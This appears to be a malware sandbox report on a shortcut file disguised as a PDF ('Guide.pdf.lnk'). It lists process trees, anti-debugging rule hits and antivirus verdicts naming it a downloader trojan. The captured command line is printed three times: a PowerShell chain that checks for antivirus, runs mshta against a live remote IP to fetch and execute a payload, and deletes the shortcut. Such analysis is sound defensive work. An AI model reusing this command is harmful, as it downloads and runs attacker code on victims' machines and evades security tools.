Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | July 31, 2024, 9:34 a.m. | July 31, 2024, 9:37 a.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "bqPCVZhtEvYWmvV" C:\Users\test22\AppData\Local\Temp\Guide.pdf.lnk
3016-
forfiles.exe "C:\Windows\System32\forfiles.exe" $R = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($T in $R ){if ($T.displayName -replace 'Windows Defender', ''){Exit}}/p C:\Windows\System32 /m calc.exe /c "powershell . mshta http://141.98.234.166/Yotsuba";$GhUV = Get-Location;$GhUV = Join-Path $GhUV 'Guide.pdf.lnk';del $GhUV
2216
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
164.124.101.2 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\Guide.pdf.lnk |
cmdline | "C:\Windows\System32\forfiles.exe" $R = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($T in $R ){if ($T.displayName -replace 'Windows Defender', ''){Exit}}/p C:\Windows\System32 /m calc.exe /c "powershell . mshta http://141.98.234.166/Yotsuba";$GhUV = Get-Location;$GhUV = Join-Path $GhUV 'Guide.pdf.lnk';del $GhUV |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | "C:\Windows\System32\forfiles.exe" $R = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($T in $R ){if ($T.displayName -replace 'Windows Defender', ''){Exit}}/p C:\Windows\System32 /m calc.exe /c "powershell . mshta http://141.98.234.166/Yotsuba";$GhUV = Get-Location;$GhUV = Join-Path $GhUV 'Guide.pdf.lnk';del $GhUV |
Malwarebytes | Trojan.Downloader.Generic |
VIPRE | Heur.BZC.YAX.Pantera.47.5F1CFF92 |
Arcabit | Heur.BZC.YAX.Pantera.47.5F1CFF92 |
Symantec | CL.Downloader!gen111 |
Avast | LNK:Agent-EJ [Trj] |
Kaspersky | HEUR:Trojan.Multi.Agent.gen |
BitDefender | Heur.BZC.YAX.Pantera.47.5F1CFF92 |
MicroWorld-eScan | Heur.BZC.YAX.Pantera.47.5F1CFF92 |
Rising | Downloader.Mshta/LNK!1.BADA (CLASSIC) |
Emsisoft | Heur.BZC.YAX.Pantera.47.5F1CFF92 (B) |
F-Secure | Trojan:W32/LnkGen.C |
FireEye | Heur.BZC.YAX.Pantera.47.5F1CFF92 |
Sophos | Troj/DownLnk-X |
SentinelOne | Static AI - Suspicious LNK |
Detected | |
MAX | malware (ai score=85) |
Microsoft | Trojan:Win32/WinLNK.HNE!MTB |
ZoneAlarm | HEUR:Trojan.Multi.Agent.gen |
GData | Heur.BZC.YAX.Pantera.47.5F1CFF92 |
AhnLab-V3 | LNK/Autorun.Gen |
huorong | TrojanDownloader/LNK.Agent.da |
AVG | LNK:Agent-EJ [Trj] |